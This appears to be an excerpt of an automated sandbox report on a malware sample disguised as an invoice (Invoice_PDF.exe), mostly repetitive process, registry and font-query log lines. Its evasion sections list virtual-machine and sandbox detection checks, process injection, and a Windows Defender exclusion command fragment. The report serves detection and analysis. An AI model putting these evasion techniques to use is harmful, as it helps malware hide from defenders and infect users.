                      Source: C:\Users\user\Desktop\Invoice_PDF.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion:

                      barindex
                      Yara detected AntiVM3Show sources
                      Source: Yara matchFile source: 0.2.Invoice_PDF.exe.304a634.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.276354246.0000000003021000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Invoice_PDF.exe PID: 6140, type: MEMORYSTR
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                      Source: Invoice_PDF.exe, 00000000.00000002.276354246.0000000003021000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
                      Source: Invoice_PDF.exe, 00000000.00000002.276354246.0000000003021000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
                      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\Desktop\Invoice_PDF.exe TID: 5136Thread sleep time: -35736s >= -30000s
                      Source: C:\Users\user\Desktop\Invoice_PDF.exe TID: 2564Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\Desktop\Invoice_PDF.exe TID: 6460Thread sleep time: -20291418481080494s >= -30000s
                      Source: C:\Users\user\Desktop\Invoice_PDF.exe TID: 6464Thread sleep count: 1903 > 30
                      Source: C:\Users\user\Desktop\Invoice_PDF.exe TID: 6464Thread sleep count: 7944 > 30
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeWindow / User API: threadDelayed 1903
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeWindow / User API: threadDelayed 7944
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess information queried: ProcessInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeThread delayed: delay time: 35736
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeThread delayed: delay time: 922337203685477
                      Source: Invoice_PDF.exe, 00000000.00000002.276354246.0000000003021000.00000004.00000001.sdmpBinary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
                      Source: Invoice_PDF.exe, 00000000.00000002.276354246.0000000003021000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                      Source: Invoice_PDF.exe, 00000000.00000002.276354246.0000000003021000.00000004.00000001.sdmpBinary or memory string: vmware
                      Source: Invoice_PDF.exe, 00000000.00000002.276354246.0000000003021000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess token adjusted: Debug
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 3_2_01399DF0 LdrInitializeThunk,
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeMemory allocated: page read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      Injects a PE file into a foreign processesShow sources
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeMemory written: C:\Users\user\Desktop\Invoice_PDF.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess created: C:\Users\user\Desktop\Invoice_PDF.exe C:\Users\user\Desktop\Invoice_PDF.exe
                      Source: Invoice_PDF.exe, 00000003.00000002.524833112.0000000001CA0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: Invoice_PDF.exe, 00000003.00000002.524833112.0000000001CA0000.00000002.00020000.sdmpBinary or memory string: Progman
                      Source: Invoice_PDF.exe, 00000003.00000002.524833112.0000000001CA0000.00000002.00020000.sdmpBinary or memory string: SProgram Managerl
                      Source: Invoice_PDF.exe, 00000003.00000002.524833112.0000000001CA0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd,
                      Source: Invoice_PDF.exe, 00000003.00000002.524833112.0000000001CA0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Users\user\Desktop\Invoice_PDF.exe VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
